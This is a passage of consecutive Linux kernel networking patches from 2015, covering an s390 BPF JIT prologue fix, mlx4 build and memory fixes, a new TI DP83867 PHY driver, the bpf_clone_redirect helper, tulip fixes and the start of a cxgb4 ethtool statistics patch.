88aeca15d637c279171ba441730ef41e4c4ce0ed Mon Sep 17 00:00:00 2001 From: Michael Holzheu Date: Mon, 1 Jun 2015 22:48:35 -0700 Subject: [PATCH 665/872] s390/bpf: fix bpf frame pointer setup Currently the bpf frame pointer is set to the old r15. This is wrong because of packed stack. Fix this and adjust the frame pointer to respect packed stack. This now generates a prolog like the following: 3ff8001c3fa: eb67f0480024 stmg %r6,%r7,72(%r15) 3ff8001c400: ebcff0780024 stmg %r12,%r15,120(%r15) 3ff8001c406: b904001f lgr %r1,%r15 <- load backchain 3ff8001c40a: 41d0f048 la %r13,72(%r15) <- load adjusted bfp 3ff8001c40e: a7fbfd98 aghi %r15,-616 3ff8001c412: e310f0980024 stg %r1,152(%r15) <- save backchain Fixes: 054623105728 ("s390/bpf: Add s390x eBPF JIT compiler backend") Signed-off-by: Michael Holzheu Acked-by: Heiko Carstens Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- arch/s390/net/bpf_jit_comp.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c index 20c146d1251a..55423d8be580 100644 --- a/arch/s390/net/bpf_jit_comp.c +++ b/arch/s390/net/bpf_jit_comp.c @@ -384,13 +384,16 @@ static void bpf_jit_prologue(struct bpf_jit *jit) } /* Setup stack and backchain */ if (jit->seen & SEEN_STACK) { - /* lgr %bfp,%r15 (BPF frame pointer) */ - EMIT4(0xb9040000, BPF_REG_FP, REG_15); + if (jit->seen & SEEN_FUNC) + /* lgr %w1,%r15 (backchain) */ + EMIT4(0xb9040000, REG_W1, REG_15); + /* la %bfp,STK_160_UNUSED(%r15) (BPF frame pointer) */ + EMIT4_DISP(0x41000000, BPF_REG_FP, REG_15, STK_160_UNUSED); /* aghi %r15,-STK_OFF */ EMIT4_IMM(0xa70b0000, REG_15, -STK_OFF); if (jit->seen & SEEN_FUNC) - /* stg %bfp,152(%r15) (backchain) */ - EMIT6_DISP_LH(0xe3000000, 0x0024, BPF_REG_FP, REG_0, + /* stg %w1,152(%r15) (backchain) */ + EMIT6_DISP_LH(0xe3000000, 0x0024, REG_W1, REG_0, REG_15, 152); } /* From db9777e376b0e038fc01d1361c7ea3eaf801c718 Mon Sep 17 00:00:00 2001 From: Or Gerlitz Date: Tue, 2 Jun 2015 10:29:48 +0300 Subject: [PATCH 666/872] net/mlx4_core: Fix build failure introduced by the EQ pool changes When CONFIG_RFS_ACCEL or SMP aren't set, we fail to build, fix it. Also, avoid build warning as of unused function on that setup. Fixes: c66fa19c405a ('net/mlx4: Add EQ pool') Reported-by: Michael Ellerman Signed-off-by: Matan Barak Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/eq.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/eq.c b/drivers/net/ethernet/mellanox/mlx4/eq.c index 11168825a9fa..aae13adfb492 100644 --- a/drivers/net/ethernet/mellanox/mlx4/eq.c +++ b/drivers/net/ethernet/mellanox/mlx4/eq.c @@ -221,6 +221,7 @@ static void mlx4_slave_event(struct mlx4_dev *dev, int slave, slave_event(dev, slave, eqe); } +#if defined(CONFIG_SMP) static void mlx4_set_eq_affinity_hint(struct mlx4_priv *priv, int vec) { int hint_err; @@ -234,6 +235,7 @@ static void mlx4_set_eq_affinity_hint(struct mlx4_priv *priv, int vec) if (hint_err) mlx4_warn(dev, "irq_set_affinity_hint failed, err %d\n", hint_err); } +#endif int mlx4_gen_pkey_eqe(struct mlx4_dev *dev, int slave, u8 port) { @@ -1207,8 +1209,8 @@ int mlx4_init_eq_table(struct mlx4_dev *dev) MLX4_NUM_ASYNC_EQE + MLX4_NUM_SPARE_EQE, 0, &priv->eq_table.eq[MLX4_EQ_ASYNC]); } else { -#ifdef CONFIG_RFS_ACCEL struct mlx4_eq *eq = &priv->eq_table.eq[i]; +#ifdef CONFIG_RFS_ACCEL int port = find_first_bit(eq->actv_ports.ports, dev->caps.num_ports) + 1; From f6b59f36b463ffdd82fc804f2772194eb8abd030 Mon Sep 17 00:00:00 2001 From: Antonio Murdaca Date: Tue, 2 Jun 2015 14:35:52 +0200 Subject: [PATCH 667/872] ethernet: micrel: use time_after_eq use the time_after_eq macro for jiffies comparison operation Signed-off-by: Antonio Murdaca Signed-off-by: David S. Miller --- drivers/net/ethernet/micrel/ksz884x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/micrel/ksz884x.c b/drivers/net/ethernet/micrel/ksz884x.c index 6f332ebdf3b5..48d2aecb0da9 100644 --- a/drivers/net/ethernet/micrel/ksz884x.c +++ b/drivers/net/ethernet/micrel/ksz884x.c @@ -6664,7 +6664,7 @@ static void mib_read_work(struct work_struct *work) wake_up_interruptible( &hw_priv->counter[i].counter); } - } else if (jiffies >= hw_priv->counter[i].time) { + } else if (time_after_eq(jiffies, hw_priv->counter[i].time)) { /* Only read MIB counters when the port is connected. */ if (media_connected == mib->state) hw_priv->counter[i].read = 1; From 640b2b107cec23c754214b62a811465fa8f9257f Mon Sep 17 00:00:00 2001 From: Jiri Benc Date: Tue, 2 Jun 2015 14:36:34 +0200 Subject: [PATCH 668/872] openvswitch: disable LRO Currently, openvswitch tries to disable LRO from the user space. This does not work correctly when the device added is a vlan interface, though. Instead of dealing with possibly complex stacked cross name space relations in the user space, do the same as bridging does and call dev_disable_lro in the kernel. Signed-off-by: Jiri Benc Acked-by: Flavio Leitner Acked-by: Pravin B Shelar Signed-off-by: David S. Miller --- net/openvswitch/vport-netdev.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/openvswitch/vport-netdev.c b/net/openvswitch/vport-netdev.c index 4776282c6417..33e6d6e2908f 100644 --- a/net/openvswitch/vport-netdev.c +++ b/net/openvswitch/vport-netdev.c @@ -125,6 +125,7 @@ static struct vport *netdev_create(const struct vport_parms *parms) if (err) goto error_master_upper_dev_unlink; + dev_disable_lro(netdev_vport->dev); dev_set_promiscuity(netdev_vport->dev, 1); netdev_vport->dev->priv_flags |= IFF_OVS_DATAPATH; rtnl_unlock(); From 2a10154abcb75ad0d7b6bfea6210ac743ec60897 Mon Sep 17 00:00:00 2001 From: Dan Murphy Date: Tue, 2 Jun 2015 09:34:37 -0500 Subject: [PATCH 669/872] net: phy: dp83867: Add TI dp83867 phy Add support for the TI dp83867 Gigabit ethernet phy device. The DP83867 is a robust, low power, fully featured Physical Layer transceiver with integrated PMD sublayers to support 10BASE-T, 100BASE-TX and 1000BASE-T Ethernet protocols. Signed-off-by: Dan Murphy Signed-off-by: David S. Miller --- .../devicetree/bindings/net/ti,dp83867.txt | 19 ++ drivers/net/phy/Kconfig | 6 +- drivers/net/phy/Makefile | 1 + drivers/net/phy/dp83867.c | 239 ++++++++++++++++++ include/dt-bindings/net/ti-dp83867.h | 45 ++++ 5 files changed, 309 insertions(+), 1 deletion(-) create mode 100644 Documentation/devicetree/bindings/net/ti,dp83867.txt create mode 100644 drivers/net/phy/dp83867.c create mode 100644 include/dt-bindings/net/ti-dp83867.h diff --git a/Documentation/devicetree/bindings/net/ti,dp83867.txt b/Documentation/devicetree/bindings/net/ti,dp83867.txt new file mode 100644 index 000000000000..46bb67a222ea --- /dev/null +++ b/Documentation/devicetree/bindings/net/ti,dp83867.txt @@ -0,0 +1,19 @@ +* Texas Instruments - dp83867 Giga bit ethernet phy + +Required properties: + - reg - The ID number for the phy, usually a small integer + - ti,rx_int_delay - RGMII Recieve Clock Delay - see dt-bindings/net/ti-dp83867.h + for applicable values + - ti,tx_int_delay - RGMII Transmit Clock Delay - see dt-bindings/net/ti-dp83867.h + for applicable values + - ti,fifo_depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h + for applicable values + +Example: + + ethernet-phy@0 { + reg = <0>; + ti,rx_int_delay = ; + ti,tx_int_delay = ; + ti,fifo_depth = ; + }; diff --git a/drivers/net/phy/Kconfig b/drivers/net/phy/Kconfig index 7c0cb87d1f2f..cf18940f4e84 100644 --- a/drivers/net/phy/Kconfig +++ b/drivers/net/phy/Kconfig @@ -112,6 +112,11 @@ config MICREL_PHY ---help--- Supports the KSZ9021, VSC8201, KS8001 PHYs. +config DP83867_PHY + tristate "Drivers for Texas Instruments DP83867 Gigabit PHY" + ---help--- + Currently supports the DP83867 PHY. + config FIXED_PHY tristate "Driver for MDIO Bus/PHY emulation with fixed speed/link PHYs" depends on PHYLIB @@ -205,7 +210,6 @@ config MDIO_BCM_UNIMAC This hardware can be found in the Broadcom GENET Ethernet MAC controllers as well as some Broadcom Ethernet switches such as the Starfighter 2 switches. - endif # PHYLIB config MICREL_KS8995MA diff --git a/drivers/net/phy/Makefile b/drivers/net/phy/Makefile index e97e7f921862..fcc25a0c45cd 100644 --- a/drivers/net/phy/Makefile +++ b/drivers/net/phy/Makefile @@ -22,6 +22,7 @@ obj-$(CONFIG_MDIO_BITBANG) += mdio-bitbang.o obj-$(CONFIG_MDIO_GPIO) += mdio-gpio.o obj-$(CONFIG_NATIONAL_PHY) += national.o obj-$(CONFIG_DP83640_PHY) += dp83640.o +obj-$(CONFIG_DP83867_PHY) += dp83867.o obj-$(CONFIG_STE10XP) += ste10Xp.o obj-$(CONFIG_MICREL_PHY) += micrel.o obj-$(CONFIG_MDIO_OCTEON) += mdio-octeon.o diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c new file mode 100644 index 000000000000..ef0b4eb15f8d --- /dev/null +++ b/drivers/net/phy/dp83867.c @@ -0,0 +1,239 @@ +/* + * Driver for the Texas Instruments DP83867 PHY + * + * Copyright (C) 2015 Texas Instruments Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include +#include +#include +#include + +#include + +#define DP83867_PHY_ID 0x2000a231 +#define DP83867_DEVADDR 0x1f + +#define MII_DP83867_PHYCTRL 0x10 +#define MII_DP83867_MICR 0x12 +#define MII_DP83867_ISR 0x13 +#define DP83867_CTRL 0x1f + +/* Extended Registers */ +#define DP83867_RGMIICTL 0x0032 +#define DP83867_RGMIIDCTL 0x0086 + +#define DP83867_SW_RESET BIT(15) +#define DP83867_SW_RESTART BIT(14) + +/* MICR Interrupt bits */ +#define MII_DP83867_MICR_AN_ERR_INT_EN BIT(15) +#define MII_DP83867_MICR_SPEED_CHNG_INT_EN BIT(14) +#define MII_DP83867_MICR_DUP_MODE_CHNG_INT_EN BIT(13) +#define MII_DP83867_MICR_PAGE_RXD_INT_EN BIT(12) +#define MII_DP83867_MICR_AUTONEG_COMP_INT_EN BIT(11) +#define MII_DP83867_MICR_LINK_STS_CHNG_INT_EN BIT(10) +#define MII_DP83867_MICR_FALSE_CARRIER_INT_EN BIT(8) +#define MII_DP83867_MICR_SLEEP_MODE_CHNG_INT_EN BIT(4) +#define MII_DP83867_MICR_WOL_INT_EN BIT(3) +#define MII_DP83867_MICR_XGMII_ERR_INT_EN BIT(2) +#define MII_DP83867_MICR_POL_CHNG_INT_EN BIT(1) +#define MII_DP83867_MICR_JABBER_INT_EN BIT(0) + +/* RGMIICTL bits */ +#define DP83867_RGMII_TX_CLK_DELAY_EN BIT(1) +#define DP83867_RGMII_RX_CLK_DELAY_EN BIT(0) + +/* PHY CTRL bits */ +#define DP83867_PHYCR_FIFO_DEPTH_SHIFT 14 + +/* RGMIIDCTL bits */ +#define DP83867_RGMII_TX_CLK_DELAY_SHIFT 4 + +struct dp83867_private { + int rx_id_delay; + int tx_id_delay; + int fifo_depth; +}; + +static int dp83867_ack_interrupt(struct phy_device *phydev) +{ + int err = phy_read(phydev, MII_DP83867_ISR); + + if (err < 0) + return err; + + return 0; +} + +static int dp83867_config_intr(struct phy_device *phydev) +{ + int micr_status; + + if (phydev->interrupts == PHY_INTERRUPT_ENABLED) { + micr_status = phy_read(phydev, MII_DP83867_MICR); + if (micr_status < 0) + return micr_status; + + micr_status |= + (MII_DP83867_MICR_AN_ERR_INT_EN | + MII_DP83867_MICR_SPEED_CHNG_INT_EN | + MII_DP83867_MICR_DUP_MODE_CHNG_INT_EN | + MII_DP83867_MICR_SLEEP_MODE_CHNG_INT_EN); + + return phy_write(phydev, MII_DP83867_MICR, micr_status); + } + + micr_status = 0x0; + return phy_write(phydev, MII_DP83867_MICR, micr_status); +} + +#ifdef CONFIG_OF_MDIO +static int dp83867_of_init(struct phy_device *phydev) +{ + struct dp83867_private *dp83867 = phydev->priv; + struct device *dev = &phydev->dev; + struct device_node *of_node = dev->of_node; + int ret; + + if (!of_node && dev->parent->of_node) + of_node = dev->parent->of_node; + + if (!phydev->dev.of_node) + return -ENODEV; + + ret = of_property_read_u32(of_node, "ti,rx_int_delay", + &dp83867->rx_id_delay); + if (ret) + return ret; + + ret = of_property_read_u32(of_node, "ti,tx_int_delay", + &dp83867->tx_id_delay); + if (ret) + return ret; + + ret = of_property_read_u32(of_node, "ti,fifo_depth", + &dp83867->fifo_depth); + if (ret) + return ret; + + return 0; +} +#else +static int dp83867_of_init(struct phy_device *phydev) +{ + return 0; +} +#endif /* CONFIG_OF_MDIO */ + +static int dp83867_config_init(struct phy_device *phydev) +{ + struct dp83867_private *dp83867; + int ret; + u16 val, delay; + + if (!phydev->priv) { + dp83867 = devm_kzalloc(&phydev->dev, sizeof(*dp83867), + GFP_KERNEL); + if (!dp83867) + return -ENOMEM; + + phydev->priv = dp83867; + ret = dp83867_of_init(phydev); + if (ret) + return ret; + } else { + dp83867 = (struct dp83867_private *)phydev->priv; + } + + if (phy_interface_is_rgmii(phydev)) { + ret = phy_write(phydev, MII_DP83867_PHYCTRL, + (dp83867->fifo_depth << DP83867_PHYCR_FIFO_DEPTH_SHIFT)); + if (ret) + return ret; + } + + if ((phydev->interface >= PHY_INTERFACE_MODE_RGMII_ID) || + (phydev->interface <= PHY_INTERFACE_MODE_RGMII_RXID)) { + val = phy_read_mmd_indirect(phydev, DP83867_RGMIICTL, + DP83867_DEVADDR, phydev->addr); + + if (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) + val |= (DP83867_RGMII_TX_CLK_DELAY_EN | DP83867_RGMII_RX_CLK_DELAY_EN); + + if (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID) + val |= DP83867_RGMII_TX_CLK_DELAY_EN; + + if (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) + val |= DP83867_RGMII_RX_CLK_DELAY_EN; + + phy_write_mmd_indirect(phydev, DP83867_RGMIICTL, + DP83867_DEVADDR, phydev->addr, val); + + delay = (dp83867->rx_id_delay | + (dp83867->tx_id_delay << DP83867_RGMII_TX_CLK_DELAY_SHIFT)); + + phy_write_mmd_indirect(phydev, DP83867_RGMIIDCTL, + DP83867_DEVADDR, phydev->addr, delay); + } + + return 0; +} + +static int dp83867_phy_reset(struct phy_device *phydev) +{ + int err; + + err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESET); + if (err < 0) + return err; + + return dp83867_config_init(phydev); +} + +static struct phy_driver dp83867_driver[] = { + { + .phy_id = DP83867_PHY_ID, + .phy_id_mask = 0xfffffff0, + .name = "TI DP83867", + .features = PHY_GBIT_FEATURES, + .flags = PHY_HAS_INTERRUPT, + + .config_init = dp83867_config_init, + .soft_reset = dp83867_phy_reset, + + /* IRQ related */ + .ack_interrupt = dp83867_ack_interrupt, + .config_intr = dp83867_config_intr, + + .config_aneg = genphy_config_aneg, + .read_status = genphy_read_status, + .suspend = genphy_suspend, + .resume = genphy_resume, + + .driver = {.owner = THIS_MODULE,} + }, +}; +module_phy_driver(dp83867_driver); + +static struct mdio_device_id __maybe_unused dp83867_tbl[] = { + { DP83867_PHY_ID, 0xfffffff0 }, + { } +}; + +MODULE_DEVICE_TABLE(mdio, dp83867_tbl); + +MODULE_DESCRIPTION("Texas Instruments DP83867 PHY driver"); +MODULE_AUTHOR("Dan Murphy + * + * Copyright: (C) 2015 Texas Instruments, Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 as + * published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + */ + +#ifndef _DT_BINDINGS_TI_DP83867_H +#define _DT_BINDINGS_TI_DP83867_H + +/* PHY CTRL bits */ +#define DP83867_PHYCR_FIFO_DEPTH_3_B_NIB 0x00 +#define DP83867_PHYCR_FIFO_DEPTH_4_B_NIB 0x01 +#define DP83867_PHYCR_FIFO_DEPTH_6_B_NIB 0x02 +#define DP83867_PHYCR_FIFO_DEPTH_8_B_NIB 0x03 + +/* RGMIIDCTL internal delay for rx and tx */ +#define DP83867_RGMIIDCTL_250_PS 0x0 +#define DP83867_RGMIIDCTL_500_PS 0x1 +#define DP83867_RGMIIDCTL_750_PS 0x2 +#define DP83867_RGMIIDCTL_1_NS 0x3 +#define DP83867_RGMIIDCTL_1_25_NS 0x4 +#define DP83867_RGMIIDCTL_1_50_NS 0x5 +#define DP83867_RGMIIDCTL_1_75_NS 0x6 +#define DP83867_RGMIIDCTL_2_00_NS 0x7 +#define DP83867_RGMIIDCTL_2_25_NS 0x8 +#define DP83867_RGMIIDCTL_2_50_NS 0x9 +#define DP83867_RGMIIDCTL_2_75_NS 0xa +#define DP83867_RGMIIDCTL_3_00_NS 0xb +#define DP83867_RGMIIDCTL_3_25_NS 0xc +#define DP83867_RGMIIDCTL_3_50_NS 0xd +#define DP83867_RGMIIDCTL_3_75_NS 0xe +#define DP83867_RGMIIDCTL_4_00_NS 0xf + +#endif From e1395a321eab1a7833d82e952eb8255e0a1f03cb Mon Sep 17 00:00:00 2001 From: David Malcolm Date: Tue, 2 Jun 2015 15:31:17 -0400 Subject: [PATCH 670/872] drivers/net/ethernet/dec/tulip/uli526x.c: fix misleading indentation in uli526x_timer MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This code in drivers/net/ethernet/dec/tulip/uli526x.c function "uli526x_timer": 1086 } else 1087 if ((tmp_cr12 & 0x3) && db->link_failed) { [...snip...] 1109 } 1110 else if(!(tmp_cr12 & 0x3) && db->link_failed) 1111 { [...snip...] 1117 } 1118 db->init=0; is misleadingly indented: the db->init=0 is indented as if part of the else clause at line 1086, but it is independent of it (no braces before the "if" at line 1087). This patch fixes the indentation to reflect the actual meaning of the code, though is it actually meant to be part of the "else" clause? (I'm a compiler developer, not a kernel person). It also adds spaces around the assignment, to placate checkpatch.pl. Seen via an experimental new gcc warning I'm working on for gcc 6, -Wmisleading-indentation, using gcc r223098 adding -Werror=misleading-indentation to KBUILD_CFLAGS in Makefile. The experimental GCC emits this warning (as an error), rightly IMHO: drivers/net/ethernet/dec/tulip/uli526x.c: In function ‘uli526x_timer’: drivers/net/ethernet/dec/tulip/uli526x.c:1118:3: error: statement is indented as if it were guarded by... [-Werror=misleading-indentation] db->init=0; ^ drivers/net/ethernet/dec/tulip/uli526x.c:1086:4: note: ...this ‘else’ clause, but it is not } else ^ Hope this is helpful Dave Signed-off-by: David Malcolm Signed-off-by: David S. Miller --- drivers/net/ethernet/dec/tulip/uli526x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/dec/tulip/uli526x.c b/drivers/net/ethernet/dec/tulip/uli526x.c index 2c30c0c83f98..447d09272ab7 100644 --- a/drivers/net/ethernet/dec/tulip/uli526x.c +++ b/drivers/net/ethernet/dec/tulip/uli526x.c @@ -1115,7 +1115,7 @@ static void uli526x_timer(unsigned long data) netif_carrier_off(dev); } } - db->init=0; + db->init = 0; /* Timer active again */ db->timer.expires = ULI526X_TIMER_WUT; From 5114a04e6c73a0c6e74737e801b8a3b3d40c7e36 Mon Sep 17 00:00:00 2001 From: Carol L Soto Date: Tue, 2 Jun 2015 16:07:23 -0500 Subject: [PATCH 671/872] net/mlx4_core: double free of dev_vfs If user loads mlx4_core with num_vfs greater than supported then variable dev->dev_vfs is freed 2 times after unloading the driver. Acked-by: Or Gerlitz Signed-off-by: Carol L Soto Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/main.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 0dbd70427221..9485cbef5166 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2824,6 +2824,7 @@ static u64 mlx4_enable_sriov(struct mlx4_dev *dev, struct pci_dev *pdev, free_mem: dev->persist->num_vfs = 0; kfree(dev->dev_vfs); + dev->dev_vfs = NULL; return dev_flags & ~MLX4_FLAG_MASTER; } From ed3d2276ef72be23c6367358d80004130d8c797d Mon Sep 17 00:00:00 2001 From: Carol Soto Date: Tue, 2 Jun 2015 16:07:24 -0500 Subject: [PATCH 672/872] net/mlx4_core: need to call close fw if alloc icm is called twice If mlx4_enable_sriov is called by adapter without this feature MLX4_DEV_CAP_FLAG2_SYS_EQS then during this path the function alloc icm is called twice without freeing the structures from the first time. Acked-by: Or Gerlitz Signed-off-by: Carol L Soto Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/main.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 9485cbef5166..7d57777e65c5 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2976,6 +2976,7 @@ static int mlx4_load_one(struct pci_dev *pdev, int pci_dev_data, existing_vfs, reset_flow); + mlx4_close_fw(dev); mlx4_cmd_cleanup(dev, MLX4_CMD_CLEANUP_ALL); dev->flags = dev_flags; if (!SRIOV_VALID_STATE(dev->flags)) { From 613d8c188ffc6f24b7a64dbce74a1b78017c0238 Mon Sep 17 00:00:00 2001 From: Carol Soto Date: Tue, 2 Jun 2015 16:07:25 -0500 Subject: [PATCH 673/872] net/mlx4_core: fix typo in mlx4_set_vf_mac fix typo in mlx4_set_vf_mac Acked-by: Or Gerlitz Signed-off-by: Carol L Soto Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/cmd.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/cmd.c b/drivers/net/ethernet/mellanox/mlx4/cmd.c index 91d834495fb7..68ae765873a9 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx4/cmd.c @@ -2917,7 +2917,7 @@ int mlx4_set_vf_mac(struct mlx4_dev *dev, int port, int vf, u64 mac) port = mlx4_slaves_closest_port(dev, slave, port); s_info = &priv->mfunc.master.vf_admin[slave].vport[port]; s_info->mac = mac; - mlx4_info(dev, "default mac on vf %d port %d to %llX will take afect only after vf restart\n", + mlx4_info(dev, "default mac on vf %d port %d to %llX will take effect only after vf restart\n", vf, port, s_info->mac); return 0; } From 3896d655f4d491c67d669a15f275a39f713410f8 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Tue, 2 Jun 2015 16:03:14 -0700 Subject: [PATCH 674/872] bpf: introduce bpf_clone_redirect() helper Allow eBPF programs attached to classifier/actions to call bpf_clone_redirect(skb, ifindex, flags) helper which will mirror or redirect the packet by dynamic ifindex selection from within the program to a target device either at ingress or at egress. Can be used for various scenarios, for example, to load balance skbs into veths, split parts of the traffic to local taps, etc. Signed-off-by: Alexei Starovoitov Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- include/uapi/linux/bpf.h | 10 ++++++++++ net/core/filter.c | 40 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 50 insertions(+) diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h index 72f3080afa1e..42aa19abab86 100644 --- a/include/uapi/linux/bpf.h +++ b/include/uapi/linux/bpf.h @@ -220,6 +220,16 @@ enum bpf_func_id { * Return: 0 on success */ BPF_FUNC_tail_call, + + /** + * bpf_clone_redirect(skb, ifindex, flags) - redirect to another netdev + * @skb: pointer to skb + * @ifindex: ifindex of the net device + * @flags: bit 0 - if set, redirect to ingress instead of egress + * other bits - reserved + * Return: 0 on success + */ + BPF_FUNC_clone_redirect, __BPF_FUNC_MAX_ID, }; diff --git a/net/core/filter.c b/net/core/filter.c index b78a010a957f..64c121c09655 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -46,6 +46,7 @@ #include #include #include +#include /** * sk_filter - run a packet through a socket filter @@ -1407,6 +1408,43 @@ const struct bpf_func_proto bpf_l4_csum_replace_proto = { .arg5_type = ARG_ANYTHING, }; +#define BPF_IS_REDIRECT_INGRESS(flags) ((flags) & 1) + +static u64 bpf_clone_redirect(u64 r1, u64 ifindex, u64 flags, u64 r4, u64 r5) +{ + struct sk_buff *skb = (struct sk_buff *) (long) r1, *skb2; + struct net_device *dev; + + dev = dev_get_by_index_rcu(dev_net(skb->dev), ifindex); + if (unlikely(!dev)) + return -EINVAL; + + if (unlikely(!(dev->flags & IFF_UP))) + return -EINVAL; + + skb2 = skb_clone(skb, GFP_ATOMIC); + if (unlikely(!skb2)) + return -ENOMEM; + + if (G_TC_AT(skb2->tc_verd) & AT_INGRESS) + skb_push(skb2, skb2->mac_len); + + if (BPF_IS_REDIRECT_INGRESS(flags)) + return dev_forward_skb(dev, skb2); + + skb2->dev = dev; + return dev_queue_xmit(skb2); +} + +const struct bpf_func_proto bpf_clone_redirect_proto = { + .func = bpf_clone_redirect, + .gpl_only = false, + .ret_type = RET_INTEGER, + .arg1_type = ARG_PTR_TO_CTX, + .arg2_type = ARG_ANYTHING, + .arg3_type = ARG_ANYTHING, +}; + static const struct bpf_func_proto * sk_filter_func_proto(enum bpf_func_id func_id) { @@ -1440,6 +1478,8 @@ tc_cls_act_func_proto(enum bpf_func_id func_id) return &bpf_l3_csum_replace_proto; case BPF_FUNC_l4_csum_replace: return &bpf_l4_csum_replace_proto; + case BPF_FUNC_clone_redirect: + return &bpf_clone_redirect_proto; default: return sk_filter_func_proto(func_id); } From 3349b0b79e38f740fb794d3989d8bb3dd107fda0 Mon Sep 17 00:00:00 2001 From: Rasmus Villemoes Date: Wed, 3 Jun 2015 13:44:03 +0200 Subject: [PATCH 675/872] net: tulip: rearrange order of searching for substrings Currently, two of the branches are dead code, since an earlier smaller substring would have been found ("TP" in the "TP_NW" case and either of "BNC" and "AUI" in the "BNC_AUI" case). Rearrange the strstr() calls so that the longer strings are searched for first. Signed-off-by: Rasmus Villemoes Signed-off-by: David S. Miller --- drivers/net/ethernet/dec/tulip/de4x5.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/dec/tulip/de4x5.c b/drivers/net/ethernet/dec/tulip/de4x5.c index badff181e719..8966f3159bb2 100644 --- a/drivers/net/ethernet/dec/tulip/de4x5.c +++ b/drivers/net/ethernet/dec/tulip/de4x5.c @@ -5189,16 +5189,16 @@ de4x5_parse_params(struct net_device *dev) if (strstr(p, "fdx") || strstr(p, "FDX")) lp->params.fdx = true; if (strstr(p, "autosense") || strstr(p, "AUTOSENSE")) { - if (strstr(p, "TP")) { - lp->params.autosense = TP; - } else if (strstr(p, "TP_NW")) { + if (strstr(p, "TP_NW")) { lp->params.autosense = TP_NW; + } else if (strstr(p, "TP")) { + lp->params.autosense = TP; + } else if (strstr(p, "BNC_AUI")) { + lp->params.autosense = BNC; } else if (strstr(p, "BNC")) { lp->params.autosense = BNC; } else if (strstr(p, "AUI")) { lp->params.autosense = AUI; - } else if (strstr(p, "BNC_AUI")) { - lp->params.autosense = BNC; } else if (strstr(p, "10Mb")) { lp->params.autosense = _10Mb; } else if (strstr(p, "100Mb")) { From a4cfd929c90afaf26be6aea1989feed068844c68 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:39 +0530 Subject: [PATCH 676/872] cxgb4: Add ethtool support to get adapter stats Add ethtool support to get adapter specific hardware statistics Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/infiniband/hw/cxgb4/provider.c | 8 +- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 58 ++++++-- .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 129 +++++++++++++++--- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 10 +- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 119 ++++++++++++++-- drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 10 ++ 6 files changed, 284 insertions(+), 50 deletions(-) diff --git a/drivers/infiniband/hw/cxgb4/provider.c b/drivers/infiniband/hw/cxgb4/provider.c index 66bd6a2ad83b..d95a0c300b03 100644 --- a/drivers/infiniband/hw/cxgb4/provider.c +++ b/drivers/infiniband/hw/cxgb4/provider.c @@ -445,10 +445,10 @@ static int c4iw_get_mib(struct ib_device *ibdev, cxgb4_get_tcp_stats(c4iw_dev->rdev.lldi.pdev, &v4, &v6); memset(stats, 0, sizeof *stats); - stats->iw.tcpInSegs = v4.tcpInSegs + v6.tcpInSegs; - stats->iw.tcpOutSegs = v4.tcpOutSegs + v6.tcpOutSegs; - stats->iw.tcpRetransSegs = v4.tcpRetransSegs + v6.tcpRetransSegs; - stats->iw.tcpOutRsts = v4.tcpOutRsts + 